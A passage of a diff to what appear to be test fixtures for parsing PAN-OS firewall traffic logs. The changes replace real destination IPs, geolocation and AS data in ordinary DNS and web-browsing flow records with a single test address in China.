- "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26502,1,52489,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
+ "ingested": "2021-12-09T13:43:22.381914100Z",
+ "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26502,1,52489,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
 "created": "2012-10-30T09:46:27.000-04:00",
 "timezone": "America/New_York",
 "kind": "event", 
@@ -7801,27 +7817,26 @@
 "destination": {
 "nat": {},
 "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-FL",
- "city_name": "Fort Lauderdale",
- "country_iso_code": "US",
- "country_name": "United States",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_iso_code": "CN",
+ "country_name": "China",
 "name": "United States",
- "region_name": "Florida",
+ "region_name": "Jilin",
 "location": {
- "lon": -80.1749,
- "lat": 26.1792
+ "lon": 125.3228,
+ "lat": 43.88
 }
 },
 "as": {
- "number": 27357,
+ "number": 4837,
 "organization": {
- "name": "Rackspace Hosting"
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 80,
 "bytes": 0,
- "ip": "204.232.231.46",
+ "ip": "175.16.199.1",
 "packets": 0
 },
 "rule": {
@@ -7840,7 +7855,7 @@
 },
 "packets": 1
 },
- "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26338,1,59298,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
+ "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26338,1,59298,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
 "panw": {
 "panos": {
 "ruleset": "rule1",
@@ -7874,7 +7889,7 @@
 "preserve_original_event"
 ],
 "network": {
- "community_id": "1:BG6Rk6e+H9jRcZHXqRPFG4iA3uU=",
+ "community_id": "1:Khx1n7BSHDnacX/jmUf9qzaA43E=",
 "transport": "tcp",
 "application": "web-browsing",
 "type": "ipv4", 
@@ -7912,14 +7927,14 @@
 ],
 "ip": [
 "192.168.0.2",
- "204.232.231.46",
+ "175.16.199.1",
 "0.0.0.0"
 ]
 },
 "event": {
 "duration": 0,
- "ingested": "2021-09-08T12:38:09.284162490Z",
- "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26338,1,59298,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
+ "ingested": "2021-12-09T13:43:22.381917700Z",
+ "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26338,1,59298,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
 "created": "2012-10-30T09:46:27.000-04:00",
 "timezone": "America/New_York",
 "kind": "event",
@@ -7942,24 +7957,26 @@
 "destination": {
 "nat": {},
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_iso_code": "CN",
+ "country_name": "China",
 "name": "United States",
+ "region_name": "Jilin",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": 125.3228,
+ "lat": 43.88
+ }
 },
 "as": {
- "number": 209,
+ "number": 4837,
 "organization": {
- "name": "CenturyLink Communications, LLC"
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 53,
 "bytes": 0,
- "ip": "205.171.2.25",
+ "ip": "175.16.199.1",
 "packets": 0
 },
 "rule": { 
@@ -7978,7 +7995,7 @@
 },
 "packets": 1
 },
- "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24919,1,60185,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
+ "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24919,1,60185,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
 "panw": {
 "panos": {
 "ruleset": "rule1",
@@ -8012,7 +8029,7 @@
 "preserve_original_event"
 ],
 "network": {
- "community_id": "1:eLVg5C7+4Gz+x6GBj4MlJHk/vyk=",
+ "community_id": "1:Tx3onLvTrGHWbw9jSpPlhL83coo=",
 "transport": "udp",
 "application": "dns",
 "type": "ipv4",
@@ -8050,14 +8067,14 @@
 ],
 "ip": [
 "192.168.0.2",
- "205.171.2.25",
+ "175.16.199.1",
 "0.0.0.0"
 ]
 },
 "event": {
 "duration": 0,
- "ingested": "2021-09-08T12:38:09.284167111Z",
- "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24919,1,60185,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
+ "ingested": "2021-12-09T13:43:22.381922200Z",
+ "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24919,1,60185,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
 "created": "2012-10-30T09:46:27.000-04:00",
 "timezone": "America/New_York",
 "kind": "event", 
@@ -8080,24 +8097,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 209, + "number": 4837, "organization": { - "name": "CenturyLink Communications, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 0, - "ip": "205.171.2.25", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -8116,7 +8135,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26731,1,51817,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26731,1,51817,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -8150,7 +8169,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:2v1FAVArMu9Fw0rZTZH/beAYGjs=", + "community_id": "1:LrXKuG1XYjMaeIzdWbYuIH9SBhk=", "transport": "udp", "application": "dns", "type": "ipv4", 
@@ -8188,14 +8207,14 @@ ], "ip": [ "192.168.0.2", - "205.171.2.25", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284171648Z", - "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26731,1,51817,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381927700Z", + "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26731,1,51817,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:27.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -8218,27 +8237,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Washington", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -78.1539, - "lat": 38.7095 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 8075, + "number": 4837, "organization": { - "name": "Microsoft Corporation" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 40043, "bytes": 0, - "ip": "65.55.223.31", + "ip": "175.16.199.1", "packets": 0 }, "rule": { 
@@ -8257,7 +8275,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,65.55.223.31,0.0.0.0,0.0.0.0,rule1,crusher,,skype-probe,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26504,1,47752,40043,0,0,0x200000,udp,allow,186,186,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,skype-probe,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26504,1,47752,40043,0,0,0x200000,udp,allow,186,186,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -8291,7 +8309,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:2fa34ze5XsRR97Shg/2DWoWt57c=", + "community_id": "1:ZvhVKLesx3HCgjQ4hrbMAnhmUEc=", "transport": "udp", "application": "skype-probe", "type": "ipv4", @@ -8329,14 +8347,14 @@ ], "ip": [ "192.168.0.2", - "65.55.223.31", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284180747Z", - "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,65.55.223.31,0.0.0.0,0.0.0.0,rule1,crusher,,skype-probe,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26504,1,47752,40043,0,0,0x200000,udp,allow,186,186,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381933Z", + "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,skype-probe,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26504,1,47752,40043,0,0,0x200000,udp,allow,186,186,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:27.000-04:00", "timezone": "America/New_York", "kind": "event", 
@@ -8359,27 +8377,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 0, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -8398,7 +8415,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25543,1,59297,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25543,1,59297,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -8432,7 +8449,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:Sa+u435/AIAAeEelFduJmiGLOv0=", + "community_id": "1:045bWPQTN726UkmixpDOZJC9Yi4=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", 
@@ -8470,14 +8487,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284186495Z", - "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25543,1,59297,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381936600Z", + "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25543,1,59297,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:27.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -8500,24 +8517,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 209, + "number": 4837, "organization": { - "name": "CenturyLink Communications, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 0, - "ip": "205.171.2.25", + "ip": "175.16.199.1", "packets": 0 }, "rule": { 
@@ -8536,7 +8555,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,21948,1,52537,53,0,0,0x200000,udp,allow,82,82,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,21948,1,52537,53,0,0,0x200000,udp,allow,82,82,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -8570,7 +8589,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:Uym9anPFBcnC+VaX8dVhkzw/pgg=", + "community_id": "1:+QyXDOSn5QU83Zpzf/u/C5O9eZg=", "transport": "udp", "application": "dns", "type": "ipv4", @@ -8608,14 +8627,14 @@ ], "ip": [ "192.168.0.2", - "205.171.2.25", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284190944Z", - "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,21948,1,52537,53,0,0,0x200000,udp,allow,82,82,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381940400Z", + "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,21948,1,52537,53,0,0,0x200000,udp,allow,82,82,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:27.000-04:00", "timezone": "America/New_York", "kind": "event", 
@@ -8638,24 +8657,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 209, + "number": 4837, "organization": { - "name": "CenturyLink Communications, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 0, - "ip": "205.171.2.25", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -8674,7 +8695,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,26279,1,53155,53,0,0,0x200000,udp,allow,82,82,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,26279,1,53155,53,0,0,0x200000,udp,allow,82,82,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -8708,7 +8729,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:BWJpN5ucpEKzwxBd0yrkows1+X4=", + "community_id": "1:xO3lQ3ualTD7YgSjyemycCyFsXM=", "transport": "udp", "application": "dns", "type": "ipv4", 
@@ -8746,14 +8767,14 @@ ], "ip": [ "192.168.0.2", - "205.171.2.25", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284195597Z", - "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,26279,1,53155,53,0,0,0x200000,udp,allow,82,82,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381944600Z", + "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,26279,1,53155,53,0,0,0x200000,udp,allow,82,82,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:27.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -8776,24 +8797,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "Europe", - "country_name": "Italy", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "Italy", + "region_name": "Jilin", "location": { - "lon": 12.1097, - "lat": 43.1479 - }, - "country_iso_code": "IT" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 3269, + "number": 4837, "organization": { - "name": "Telecom Italia" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 906, - "ip": "62.211.68.12", + "ip": "175.16.199.1", "packets": 7 }, "rule": { 
@@ -8812,7 +8835,7 @@ }, "packets": 6 }, - "message": "192.168.0.2,62.211.68.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24894,1,59197,80,0,0,0x200000,tcp,allow,1487,581,906,13,2012/04/10 04:39:21,1,entertainment-and-arts,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24894,1,59197,80,0,0,0x200000,tcp,allow,1487,581,906,13,2012/04/10 04:39:21,1,entertainment-and-arts,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7", "panw": { "panos": { "ruleset": "rule1", @@ -8846,7 +8869,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:k2B753fAG7GMJoQhAbMrDsOfDxA=", + "community_id": "1:1Hs2Bdv67IgwL7EEUAUB2v1f0Jc=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", 
@@ -8884,14 +8907,14 @@ ], "ip": [ "192.168.0.2", - "62.211.68.12", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 1000000000, - "ingested": "2021-09-08T12:38:09.284200199Z", - "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:52,192.168.0.2,62.211.68.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24894,1,59197,80,0,0,0x200000,tcp,allow,1487,581,906,13,2012/04/10 04:39:21,1,entertainment-and-arts,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7", + "ingested": "2021-12-09T13:43:22.381948800Z", + "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24894,1,59197,80,0,0,0x200000,tcp,allow,1487,581,906,13,2012/04/10 04:39:21,1,entertainment-and-arts,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -8914,24 +8937,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 209, + "number": 4837, "organization": { - "name": "CenturyLink Communications, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 163, - "ip": "205.171.2.25", + "ip": "175.16.199.1", "packets": 1 }, "rule": { 
@@ -8950,7 +8975,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24985,1,56995,53,0,0,0x200000,udp,allow,251,88,163,2,2012/04/10 04:39:22,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24985,1,56995,53,0,0,0x200000,udp,allow,251,88,163,2,2012/04/10 04:39:22,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", "panw": { "panos": { "ruleset": "rule1", @@ -8984,7 +9009,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:PkU1rpfXiwvVRig4MJMcDvEUEas=", + "community_id": "1:nv/gX5sRpJUjRzOza0YzZGiUqxE=", "transport": "udp", "application": "dns", "type": "ipv4", @@ -9022,14 +9047,14 @@ ], "ip": [ "192.168.0.2", - "205.171.2.25", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284210226Z", - "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:52,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24985,1,56995,53,0,0,0x200000,udp,allow,251,88,163,2,2012/04/10 04:39:22,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", + "ingested": "2021-12-09T13:43:22.381953400Z", + "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24985,1,56995,53,0,0,0x200000,udp,allow,251,88,163,2,2012/04/10 04:39:22,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", "kind": "event", 
@@ -9052,24 +9077,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 209, + "number": 4837, "organization": { - "name": "CenturyLink Communications, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 0, - "ip": "205.171.2.25", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -9088,7 +9115,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,25380,1,59069,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 